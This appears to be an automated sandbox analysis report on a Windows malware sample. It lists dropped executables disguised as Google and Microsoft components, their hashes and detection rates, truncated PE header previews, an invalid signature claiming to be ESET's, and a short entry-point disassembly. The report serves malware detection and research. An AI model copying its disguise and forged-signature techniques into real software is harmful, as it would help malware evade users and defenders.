SSDEEP:	98304:Zr+dbd33oSpsJu9oR+bY11UhoIwBOqF85EiqrvBb2s4U5OoNkI9xFvPrBtOs6ha:x+BzpWu891ZDBOr+iqrpbTLp/U
MD5:	8CD1EA50F8F4C45055400E70DA52B326
SHA1:	40AF98091E8C32CE9C90502B3D851EBC231CACF9
SHA-256:	66552CBE03B205CBA08A2524FB93303DEC5EDF51188758B08D12624DB1EE73E1
SHA-512:	B0BE3ACCCF8CE64343B10E33B7CD5E7292164259D65C07E0C63C08DC05BFA0CF268290B3A37F20F6AFA81D7163BE8C90AC9AE9A7FB93C3E61CBC08310A2BEAF1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...xb..xb..xb.....rb......b.....lb.....Tb.....ib..*...lb.....}b..xb..,b.....{b...i.yb.....yb..Richxb..........................PE..L.....qc.................2....`......o.......P....@..........................Pb.......b...@.................................D.\.<.... ]......................0b.\|.....\.......................\.......\.@............P...............................text...30.......2.................. ..`.rdata....[..P....[..6..............@..@.data.........].......\.............@....rsrc........ ].......\.............@..@.reloc..\|....0b.......a.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\ofg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.270431868500399
Encrypted:	false
SSDEEP:	1536:apyR0Fl1K6g0e8hsEvKAxtE4zo8Sw7Ky7NGHjQR54z5sW0cd/cbPpGA/uYEmsn:a9l1Ed8hsEfLoBw7p7B54p/uPpGA/VEr
MD5:	33DAD992607D0FFD44D2C81FE67F8FB1
SHA1:	E5B67DC05505FB1232504231F41CBA225C282D3C
SHA-256:	95903D8C2D48C4C0667E41878807F646F7648A33ED25D0EB433AAB41C25E31A4
SHA-512:	444973B44292C433A07E5F75F6580EA71799B1F835677BC5B2E42AF6B567A2F70F1B038F019D250A18216701CCF901B300632487EEBCC1113AC803EDB43159E4
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}f.I9...9...9....u..3....u.......u..-...kr......kr..(...kr..*....u..0...9...X....r..8....r=.8....r..8...Rich9...........................PE..L...oz~c.............................$............@.......................................@..................................L..d...............................L....?..8....................@.......?..@...............T............................text............................... ..`.rdata...d.......f..................@..@.data........`.......<..............@....rsrc................F..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conchsvt.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2752
Entropy (8bit):	5.335270411216887
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHK1HP:iqXeqm00YqhQnouOqLqdqNq2qzcGtIx+
MD5:	4A0DB099C9CC2FAB04C1ED3C114D8DD8
SHA1:	0C2BDD1A110E64BD8763A13A88850326A6F34BA7
SHA-256:	7D8E7C2F15B9B4E662931B43C8F84523C3F93FD315BF48EC31FA04AC6DF2F8BB
SHA-512:	FACDD79706F68370F71863E28E161C0EDAC2DDC37EE4CA7D7C386C33B6477CF107A5EF3CED1F91A972EE7A0442E790CDEAA3C78D6744B98C54C2E075B9E9ECEA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	40219
Entropy (8bit):	5.057647868236002
Encrypted:	false
SSDEEP:	768:bgxV3IpNBQkj25h4iUxmfrRJv5FVvCxHBG75ard3nndOdBezktAHkaNZtNKe7MEf:bgxV3CNBQkj25h4iUxmflJnVv6H65qdB
MD5:	38B362FBEDAECF7FE3AD3D590C79AFFF
SHA1:	8CD4DCCDE323517C4DED6430A2474CF1D51FDF2B
SHA-256:	50E185C41997CC3867A3DC87ED2E2E5D282D3788DC42B57D0EE92B6435440E31
SHA-512:	472D67172E15AF3ECDBDA6A17B7ED4F2FED1BC314CA86FF00F3F9A35A100C9BB38ED319364FDBA2BB0DE3F69314A840862B4F51CEE9BEF23DE7058CE471A736D
Malicious:	false
Preview:	PSMODULECACHE.;..._t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............S...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1........Get-NetSwitchTeam........Add-NetSwitchTeamMember........Get-NetSwitchTeamMember........Remove-NetSwitchTeamMember........New-NetSwitchTeam........Rename-NetSwitchTeam........Remove-NetSwitchTeam.........P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21780
Entropy (8bit):	5.477432080597697
Encrypted:	false
SSDEEP:	384:JtCRLi0O/wPj09dIISVpiiJmQu0oMNsInR5ZoFRVrdOFoBQv3++RYM:/wLYPU0iJmQBN5TapDLM
MD5:	84F7FE696269DB566626C81E676EEE44
SHA1:	A79320B8AAC5F36A334213800D422E21FBE1A812
SHA-256:	D6AF1F3F6A11CF0228DACEECA6BE8E5C343E925E929C65FB1CBB2854217EF52D
SHA-512:	112F2DE2519FED41A28320BE6588B2F760EC4A09D9E3560784E65ADBDCFF32656698CCB18020408F7A891C3D8A6FA2FFDB531CEEBF0AE56DFE787E8B5CCBD2FC
Malicious:	false
Preview:	@...e.........................}.}.........*..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)}.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Microsoft\conchsvt.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	5.260084451666705
Encrypted:	false
SSDEEP:	768:f05Vx5qa/mytcR8D6Geg4bkTMyDFvxTJDsTX+GP:fgV2aHciTegKUFvJJDsr+K
MD5:	68E3359674EE7D49550B09E7FF69DCCE
SHA1:	BCB5D12FA5433EF5E4B78A4125EB77357E285908
SHA-256:	DD255D9CBCECED70A7FE5AE66133DE9C3333C72DE6E3D8A4D3F88A8A8108370D
SHA-512:	0E3D050A82DCDBD8F4688BE67DAD2AB9A2E054705BA6D176E381A0D1851202E1E75B7057E88099FB66D9475B20EBE0F5469AD058DDBE94C3EB29AA4100CC0098
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..f............... ........@.. ..............................h.....@.................................P...K.................................................................................... ............... ..H............text....e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H.......dd... ...........'...<..........................................6.(.....(....z.,..{....,..{....o......(......s....}......(..... ... ....s....(.....r...po......(T...6..{4...oU....~5...-.r~..p.....(-...oG...sV....5...~5....~6......6...V(....r...p~6...oW...f.r...p}8....(T.....}8....sS....7....~9...-.r<..p.....(-...oG...sV....9...~9....~:......:....~;.....([...Vs!...(\...t.....;......0..8.......~....o....~....(.......+.....~.....o......X....i2...&......

C:\Users\user\AppData\Local\Temp\8FB9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mayf4ur.is2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtwe5bzc.a4i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ionjh52t.0eo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obgdug1p.0k0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pffqrckg.u0s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw1jhhw2.lxd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw1sdrmr.ox4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnwxfg2h.qdz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\zonewar.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	124986
Entropy (8bit):	7.047741935546582
Encrypted:	false
SSDEEP:	1536:3NKVc3sjLB/nCOsF8dEF+P4PdkbhIb2v3UV9HNiOCdc5mj0kXoU:3NKVc3Q3t3Ib249H5XUFYU
MD5:	B5CC85BB2FCFA979BC843618C0119D05
SHA1:	078378B1E2E2E82F7665AAC38153987282A6A5F6
SHA-256:	A8074C1240CBB1D7590E3322F30FB8EFF01DD668B5B4D516A518D4531724369A
SHA-512:	916AF7E014F845E3DFA11A5B743C384FAD6FDE9DED3B172768320731B8E12C04F8F883B8A345034558948CA02DE07D47062ED4B26713B80CE1CDEFDDB792AC5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.c...............'.X...v...............p....@..........................@............@... .............................................................................................4n......................................................text...DW.......X..................`..`.data........p.......\..............@....rdata.......`.......J..............@..@/4...................\..............@..@.bss.....................................idata...............f..............@....CRT....0............l..............@....tls.................n..............@....reloc...............p..............@..B/14.....8............z..............@..B/29..................\|..............@..B/41.................................@..B/55.................................@..B/67.....8.... ......................@..B/80..........0......................@..B........................

C:\Windows\GoogleUpdate.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\chrome.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	154456
Entropy (8bit):	5.948865342404173
Encrypted:	false
SSDEEP:	3072:UAt2Sb2m5oyiTOZQvfSERdX9Zk8ACB+6l4nfS3wjVSzpD2MhkNJoSloS+Zh52ruK:fxwjRjB+O+/H
MD5:	9A66A3DE2589F7108426AF37AB7F6B41
SHA1:	12950D906FF703F3A1E0BD973FCA2B433E5AB207
SHA-256:	A913415626433D5D0F07D3EC4084A67FF6F5138C3C3F64E36DD0C1AE4C423C65
SHA-512:	A4E81BFFBFA4D3987A8C10CEC5673FD0C8AECBB96104253731BFCAB645090E631786FF7BDE78607CBB2D242EE62051D41658059FCBBC4990C40DBB0FEC66FCD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....cg.}....ce......cd.o......f......e......^....cy.z...w...........v.....i.v...w...M.......v...Richw...........................PE..L.....u`............................Bt.......0....@..........................`......g.....@.................................LQ..x....`..P............&..X5...P.......[..T............................[..@............P..H............................text...T........................... ..`.data........0......."..............@....idata.......P.......*..............@..@.rsrc...P....`.......4..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.2862932557886735
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N2wufLmC74.exe
File size:	2580721
MD5:	a55758362b29072504453d64e5d475cd
SHA1:	5fa4b6cf5496e22791a0840cba5074e9a25eea16
SHA256:	ed75d66b5d971ec01613881d3e088081222411e8315428e6cb049d5699ce31bc
SHA512:	ccc627ad153e95a21634700fb82aae9b7d4b6f1a9edb348021775541b75e0bef5bc8c2683a0372b93f44f5684fbc2b2043f52fd71b816c37c0e9e9a5896290d9
SSDEEP:	24576:pxTo3fi6zSaHcsFV03AQgs5ehYWTnxoQ/D2+mpS/5sqR91HdbHQ4enA4jBmkj1gb:XT22ZePnxogDP/5fF9bHgj0tl
TLSH:	A2C51A035A8B0D65DDD27BB461CB633AA734FE30CA2A9B7FFA08C53559532C46C1A742
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c....@Z.........'.....j....................@..........................P........'...@... ............................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x401490
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6386F411 [Wed Nov 30 06:11:29 2022 UTC]
TLS Callbacks:	0x415370, 0x415320
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	26093aeed04a948c138ea9102034d47f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Entrust Extended Validation Code Signing CA - EVCS1, OU="(c) 2015 Entrust, Inc. - for authorized use only", OU=See www.entrust.net/legal-terms, O="Entrust, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/8/2020 6:34:57 AM 12/8/2023 6:34:56 AM
Subject Chain	CN="ESET, spol. s r.o.", SERIALNUMBER=31 333 532, OID.2.5.4.15=Private Organization, O="ESET, spol. s r.o.", OID.1.3.6.1.4.1.311.60.2.1.3=SK, L=Bratislava, C=SK
Version:	3
Thumbprint MD5:	958E814BF6B12FAD5E25D4A0A9F789FA
Thumbprint SHA-1:	134B03AA165A151DC80CA5F7CF98290D1612FAA1
Thumbprint SHA-256:	ADB1AAF5A21CC0A45C048FD018423FCCC6D011CF63389705DB95FACA55448014
Serial:	05F97D054A9BFCBF9D5E12F8D0ABBE07

Entrypoint Preview

Instruction
mov dword ptr [00532060h], 00000000h
jmp 00007F23B832F566h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F23B83526E6h
test eax, eax
sete al
add esp, 1Ch
movzx eax, al
neg eax
ret
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 004E5000h
call dword ptr [00533208h]
sub esp, 04h
test eax, eax
je 00007F23B832F925h
mov ebx, eax
mov dword ptr [esp], 004E5000h
call dword ptr [00533224h]
mov edi, dword ptr [00533210h]
sub esp, 04h
mov dword ptr [00532020h], eax
mov dword ptr [esp+04h], 004E5013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 004E5029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [004C1004h], eax
test esi, esi
je 00007F23B832F8C3h
mov dword ptr [esp+04h], 00532024h
mov dword ptr [esp], 004F3104h
call esi
mov dword ptr [esp], 00401560h
call 00007F23B832F813h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi
pop edi
pop ebp
ret
lea esi, dword ptr [esi+00000000h]
mov eax, 0041AE40h
mov esi, 0000A660h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x133000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x271679	0x4a78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x136000	0x6314	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xec1f4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1331e4	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xbfd38	0xbfe00	False	0.37507125407166125	data	6.310412589894834	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xc1000	0x23dd0	0x23e00	False	0.7072422147212544	dBase III DBT, version number 0, next free block index 10, 1st item "D\213k\034B\\200\320\321\227\233<\035\214\\264\363\270\346\0341\215\342+\356\035_\362\2407\313\231"*"	7.1419869374925815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xe5000	0xd7e0	0xd800	False	0.3975151909722222	data	5.760750518484456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0xf3000	0x3e014	0x3e200	False	0.20325468435613683	data	4.931536963190063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x132000	0xbe0	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x133000	0xa98	0xc00	False	0.3717447916666667	data	4.835143379466301	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x134000	0x30	0x200	False	0.060546875	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x135000	0x8	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x136000	0x6314	0x6400	False	0.6262109375	data	6.629729433566289	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/14	0x13d000	0x110	0x200	False	0.259765625	Matlab v4 mat-file (little endian) *, rows 2, columns 262144	1.4688848769576526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
